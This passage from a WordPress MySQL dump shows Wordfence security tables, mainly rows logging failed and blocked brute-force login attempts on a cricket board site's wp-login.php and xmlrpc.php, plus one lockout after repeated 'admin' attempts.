�^��*9�Ո.','wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/security.php',0,'��+-�(�=%mVZ��(','��+-�(�=%mVZ��(','���a����d�8Fc�.�V�y⠏�\ro�E>�','',0,'?'),('��\"��\rkz?����','wp-content/themes/hueman/languages/tr_TR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.IY��Z^y�;�','�\'���܃�{�m\"��{W��7t�������','',0,'?'),('���Y�a�@;��ioʻ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;\"�#\'�s�[n;0�','��w\r����.)�CHz�\0��ɞ�_�\'�/t','',0,'?');
/*!40000 ALTER TABLE `wp_wffilemods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfhits`
--

DROP TABLE IF EXISTS `wp_wfhits`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhits` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `attackLogTime` double(17,6) unsigned NOT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `jsRun` tinyint(4) DEFAULT 0,
  `statusCode` int(11) NOT NULL DEFAULT 200,
  `isGoogle` tinyint(4) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `newVisit` tinyint(3) unsigned NOT NULL,
  `URL` text DEFAULT NULL,
  `referer` text DEFAULT NULL,
  `UA` text DEFAULT NULL,
  `action` varchar(64) NOT NULL DEFAULT '',
  `actionDescription` text DEFAULT NULL,
  `actionData` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`IP`,`ctime`),
  KEY `attackLogTime` (`attackLogTime`)
) ENGINE=InnoDB AUTO_INCREMENT=923 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfhits`
--

LOCK TABLES `wp_wfhits` WRITE;
/*!40000 ALTER TABLE `wp_wfhits` DISABLE KEYS */;
INSERT INTO `wp_wfhits` VALUES (1,0.000000,1624368871.384313,'\0\0\0\0\0\0\0\0\0\0���A�j',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(2,0.000000,1624368872.771320,'\0\0\0\0\0\0\0\0\0\0���A�j',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(3,0.000000,1624369818.801827,'\0\0\0\0\0\0\0\0\0\0���ƀ�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(4,0.000000,1624369827.485584,'\0\0\0\0\0\0\0\0\0\0���ƀ�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(5,0.000000,1624370878.915783,'\0\0\0\0\0\0\0\0\0\0��-O#(',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(6,0.000000,1624370882.617889,'\0\0\0\0\0\0\0\0\0\0��-O#(',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(7,0.000000,1624373042.300725,'\0\0\0\0\0\0\0\0\0\0���w�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8,0.000000,1624373043.240264,'\0\0\0\0\0\0\0\0\0\0���w�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(9,0.000000,1624376381.837556,'\0\0\0\0\0\0\0\0\0\0���G�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10,0.000000,1624376383.438323,'\0\0\0\0\0\0\0\0\0\0���G�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wordfence','blocked: Blocked by Wordfence Security Network',NULL),(11,0.000000,1624377565.729222,'\0\0\0\0\0\0\0\0\0\0��gbH',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12,0.000000,1624377570.335973,'\0\0\0\0\0\0\0\0\0\0��gbH',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(13,0.000000,1624378014.353294,'\0\0\0\0\0\0\0\0\0\0��h-��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(14,0.000000,1624378019.838216,'\0\0\0\0\0\0\0\0\0\0��h-��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(15,0.000000,1624378023.260371,'\0\0\0\0\0\0\0\0\0\0��h-��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(16,0.000000,1624378025.111788,'\0\0\0\0\0\0\0\0\0\0��h-��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(17,0.000000,1624378027.456866,'\0\0\0\0\0\0\0\0\0\0��h-��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(18,0.000000,1624378032.282298,'\0\0\0\0\0\0\0\0\0\0��h-��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(19,0.000000,1624378033.738441,'\0\0\0\0\0\0\0\0\0\0��h-��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(20,0.000000,1624378035.172599,'\0\0\0\0\0\0\0\0\0\0��h-��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(21,0.000000,1624378036.255868,'\0\0\0\0\0\0\0\0\0\0��h-��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(22,0.000000,1624378038.012536,'\0\0\0\0\0\0\0\0\0\0��h-��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(23,0.000000,1624378039.999029,'\0\0\0\0\0\0\0\0\0\0��h-��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(24,0.000000,1624378044.940757,'\0\0\0\0\0\0\0\0\0\0��h-��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(25,0.000000,1624378052.967869,'\0\0\0\0\0\0\0\0\0\0��h-��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(26,0.000000,1624378054.076252,'\0\0\0\0\0\0\0\0\0\0��h-��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(27,0.000000,1624378055.161655,'\0\0\0\0\0\0\0\0\0\0��h-��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(28,0.000000,1624378055.899026,'\0\0\0\0\0\0\0\0\0\0��h-��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(29,0.000000,1624378056.679369,'\0\0\0\0\0\0\0\0\0\0��h-��',0,503,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'admin\'',NULL),(30,0.000000,1624385519.311426,'\0\0\0\0\0\0\0\0\0\0��6$�t',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(31,0.000000,1624385522.072970,'\0\0\0\0\0\0\0\0\0\0��6$�t',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(32,0.000000,1624387860.203147,'\0\0\0\0\0\0\0\0\0\0���	Y�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(33,0.000000,1624387861.688382,'\0\0\0\0\0\0\0\0\0\0���	Y�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(34,0.000000,1624389026.958350,'\0\0\0\0\0\0\0\0\0\0���Dx1',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(35,0.000000,1624389030.280352,'\0\0\0\0\0\0\0\0\0\0���Dx1',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(36,0.000000,1624395115.416271,'\0\0\0\0\0\0\0\0\0\0���[m�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(37,0.000000,1624395116.342186,'\0\0\0\0\0\0\0\0\0\0���[m�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(38,0.000000,1624397611.229054,'\0\0\0\0\0\0\0\0\0\0���G�R',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(39,0.000000,1624397617.740952,'\0\0\0\0\0\0\0\0\0\0���G�R',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(40,0.000000,1624400135.003700,'\0\0\0\0\0\0\0\0\0\0����}�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(41,0.000000,1624400137.380358,'\0\0\0\0\0\0\0\0\0\0����}�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(42,0.000000,1624403920.297695,'\0\0\0\0\0\0\0\0\0\0��U�1',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(43,0.000000,1624403923.621947,'\0\0\0\0\0\0\0\0\0\0��U�1',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(44,0.000000,1624405299.918907,'\0\0\0\0\0\0\0\0\0\0��}�Q',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(45,0.000000,1624405314.158233,'\0\0\0\0\0\0\0\0\0\0��}�Q',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(46,0.000000,1624408992.473906,'\0\0\0\0\0\0\0\0\0\0�����&',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(47,0.000000,1624408993.440586,'\0\0\0\0\0\0\0\0\0\0�����&',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(48,0.000000,1624410330.221583,'\0\0\0\0\0\0\0\0\0\0��\'a�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(49,0.000000,1624410339.074035,'\0\0\0\0\0\0\0\0\0\0��\'a�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(50,0.000000,1624412861.225371,'\0\0\0\0\0\0\0\0\0\0��*Š',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(51,0.000000,1624412865.429553,'\0\0\0\0\0\0\0\0\0\0��*Š',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(52,0.000000,1624414187.908648,'\0\0\0\0\0\0\0\0\0\0��gbH',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(53,0.000000,1624415407.190748,'\0\0\0\0\0\0\0\0\0\0���B�Y',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(54,0.000000,1624415409.202202,'\0\0\0\0\0\0\0\0\0\0���B�Y',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(55,0.000000,1624416674.017752,'\0\0\0\0\0\0\0\0\0\0���і,',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(56,0.000000,1624416676.110170,'\0\0\0\0\0\0\0\0\0\0���і,',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(57,0.000000,1624420537.033830,'\0\0\0\0\0\0\0\0\0\0��j��',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(58,0.000000,1624420543.638730,'\0\0\0\0\0\0\0\0\0\0��j��',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(59,0.000000,1624422280.309894,'\0\0\0\0\0\0\0\0\0\0��-��#',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(60,0.000000,1624422335.451101,'\0\0\0\0\0\0\0\0\0\0����q',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(61,0.000000,1624422395.169710,'\0\0\0\0\0\0\0\0\0\0����\'',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(62,0.000000,1624422515.604403,'\0\0\0\0\0\0\0\0\0\0��6$�t',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(63,0.000000,1624422565.749812,'\0\0\0\0\0\0\0\0\0\0��[�[�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(64,0.000000,1624422632.575353,'\0\0\0\0\0\0\0\0\0\0��V?F',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(65,0.000000,1624422756.809970,'\0\0\0\0\0\0\0\0\0\0���~A',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(66,0.000000,1624422879.343685,'\0\0\0\0\0\0\0\0\0\0��F#ŕ',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(67,0.000000,1624422949.920151,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(68,0.000000,1624423198.428354,'\0\0\0\0\0\0\0\0\0\0���z�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(69,0.000000,1624423311.378029,'\0\0\0\0\0\0\0\0\0\0��^2\'',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(70,0.000000,1624423378.526333,'\0\0\0\0\0\0\0\0\0\0����9d',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(71,0.000000,1624423585.113841,'\0\0\0\0\0\0\0\0\0\0��o��',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(72,0.000000,1624423634.216934,'\0\0\0\0\0\0\0\0\0\0��Xc�f',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(73,0.000000,1624423678.044975,'\0\0\0\0\0\0\0\0\0\0����9d',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(74,0.000000,1624423864.742348,'\0\0\0\0\0\0\0\0\0\0��%:0�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(75,0.000000,1624424000.238000,'\0\0\0\0\0\0\0\0\0\0��_�E�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(76,0.000000,1624424059.919639,'\0\0\0\0\0\0\0\0\0\0���i�9',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(77,0.000000,1624424188.890307,'\0\0\0\0\0\0\0\0\0\0���FzC',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(78,0.000000,1624424270.130858,'\0\0\0\0\0\0\0\0\0\0�����0',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(79,0.000000,1624424307.710072,'\0\0\0\0\0\0\0\0\0\0��MO�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(80,0.000000,1624424370.629390,'\0\0\0\0\0\0\0\0\0\0����9d',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(81,0.000000,1624424428.051794,'\0\0\0\0\0\0\0\0\0\0���<�#',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(82,0.000000,1624424509.249604,'\0\0\0\0\0\0\0\0\0\0����\'',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(83,0.000000,1624424570.287239,'\0\0\0\0\0\0\0\0\0\0���~A',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(84,0.000000,1624424704.747232,'\0\0\0\0\0\0\0\0\0\0����N�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(85,0.000000,1624424827.544292,'\0\0\0\0\0\0\0\0\0\0���G�R',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(86,0.000000,1624424949.353073,'\0\0\0\0\0\0\0\0\0\0���i�9',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(87,0.000000,1624425030.968342,'\0\0\0\0\0\0\0\0\0\0���ɷC',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 